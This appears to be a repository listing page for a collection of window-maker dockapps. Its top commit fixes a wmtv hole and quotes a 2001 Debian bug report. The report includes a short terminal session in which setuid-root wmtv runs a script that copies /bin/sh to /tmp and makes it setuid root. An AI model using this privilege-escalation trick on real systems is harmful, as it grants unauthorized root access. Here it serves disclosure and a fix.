Go to file
Doug Torrance 74bc5a7660 wmtv: Fix security hole.
Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>.  From [1]:

   From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
   To: Debian Bug Tracking System <submit@bugs.debian.org>
   Subject: wmtv: dangerous suid root
   Date: Thu, 08 Nov 2001 20:07:52 +0100

   Hi !
   I think there is a huge security hole with wmtv and, when wmtv is installed,
   anyone can easily get a root account. Here is what I have in my terminal:
   (everytime I launch wmtv, I double-clicked in the tv subwindow to call the
   external program)

   ----------------------------------------------------------------------
   Tintin:~> wmtv -e whoami
   root
   Tintin:~> cat > crack_root.sh
   #!/bin/sh
   cp /bin/sh /tmp
   chmod u+s /tmp/sh
   Tintin:~> chmod +x crack_root.sh
   Tintin:~> wmtv -e ~/crack_root.sh
   Tintin:~> ll /tmp/sh
   -rwsr-xr-x    1 root     users      407356 Nov  8 19:25 /tmp/sh*
   ----------------------------------------------------------------------

   I tried to make wmtv non-suid root, and... sometimes it works (despite an
   error message), sometimes it does not...

   ----------------------------------------------------------------------
   Tintin:~> ll /usr/bin/X11/wmtv
   -rwxr-xr-x    1 root     root        62588 Jul 31 01:55 /usr/bin/X11/wmtv*
   Tintin:~> wmtv
   ioctl VIDIOCSFBUF: Operation not permitted

   Tintin:~> wmtv
   ioctl VIDIOCSFBUF: Operation not permitted
   wmtv: no physical frame buffer access
   ----------------------------------------------------------------------

   Hence, I guess you should either correct wmtv so that it always work without
   being suid root, or make wmtv lose its privileges before it runs an external
   program.

[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=118778
2016-02-01 15:26:00 +05:30
AlsaMixer.app Keep mute state from getting out of sync with reality 2014-12-04 10:18:32 +00:00
libdockapp libdockapp: Bump to version 0.7.2. 2015-10-21 09:07:01 -04:00
Temperature.app Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmacpi wmacpi: Update header file location. 2015-10-21 09:07:01 -04:00
wmacpiload Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmauda Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmbatteries Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmbattery wmbattery: Bump to version 2.50. 2015-08-30 21:24:10 +01:00
wmbiff wmbiff: Add missing command line options to documentation. 2015-10-26 09:44:23 -04:00
wmbutton Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmcalc wmcalc: Bump to version 0.6. 2015-08-23 08:35:36 +01:00
wmCalClock Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmcalendar Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmcdplay wmcdplay: Bump to version 1.1. 2014-12-18 18:43:10 +00:00
wmckgmail wmckgmail uses libdockapp 2015-08-16 09:41:07 +01:00
wmcliphist wmcliphist: Release version 2.1. 2014-11-23 10:26:23 +00:00
wmclock wmclock: Bump to version 1.0.16. 2015-09-24 10:16:48 +01:00
wmcpufreq wmcpufreq uses libdockapp 2015-08-16 09:41:07 +01:00
wmcpuload Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmfemon Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmfsm wmfsm: Bump to version 0.36. 2015-08-21 08:24:26 +01:00
wmfu Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmifinfo wmifinfo: Bump to version 0.10. 2014-12-09 11:17:56 +00:00
wmifs wmifs: Bump to version 1.6. 2015-08-25 15:38:01 +01:00
wmitime wmitime: Bump to version 0.5. 2015-08-21 08:23:15 +01:00
wmix Allow sound api to be specified in the config file 2015-09-17 03:23:07 +01:00
wmkeys wmkeys uses libdockapp 2015-08-16 09:41:07 +01:00
wmload wmload: Bump to version 0.9.7. 2015-08-24 07:17:16 +01:00
wmMatrix Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmmemload wmmemload: Bump to version 0.1.8. 2015-04-07 08:52:22 +01:00
wmmenu wmmenu: Update header file location. 2015-10-21 09:07:01 -04:00
wmmixer Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmmixer-alsa wmmixer-alsa: Add to repository. 2014-08-06 13:23:10 -06:00
wmmon wmmon uses libdockapp 2015-08-15 09:52:19 +01:00
wmmoonclock Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmnet wmnet: increase polling delay to 0.1 sec and maxrate to 120kb 2015-01-11 21:31:40 +00:00
wmnotify Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmpager Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmpower Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmppp.app wmppp.app: Bump to version 1.3.2. 2015-08-25 15:38:30 +01:00
wmshutdown wmshutdown: Bump to version 1.4. 2015-06-13 06:02:21 -06:00
wmsm.app wmsm uses libdockapp 2015-08-16 09:41:07 +01:00
wmsmixer Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmSMPmon wmSMPmon uses libdockapp 2015-08-16 09:41:07 +01:00
wmsun wmsun: Bump to version 1.05. 2015-08-25 15:39:34 +01:00
wmsupermon Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmtime wmtime: Bump to version 1.4. 2015-08-24 07:19:12 +01:00
wmtv wmtv: Fix security hole. 2016-02-01 15:26:00 +05:30
wmtz wmtz uses libdockapp 2015-08-16 09:41:07 +01:00
wmWeather Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmwifi Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
wmwlmon Remove trailing whitespace. 2014-10-05 19:18:49 +01:00
dockapps.db.in Add wmforecast, wmstickynotes, and wmweather+ information for webpage. 2015-06-15 23:13:09 +01:00
update-dockapps.pl Document new "hosted" field in update-dockapps.pl. 2015-06-15 23:13:08 +01:00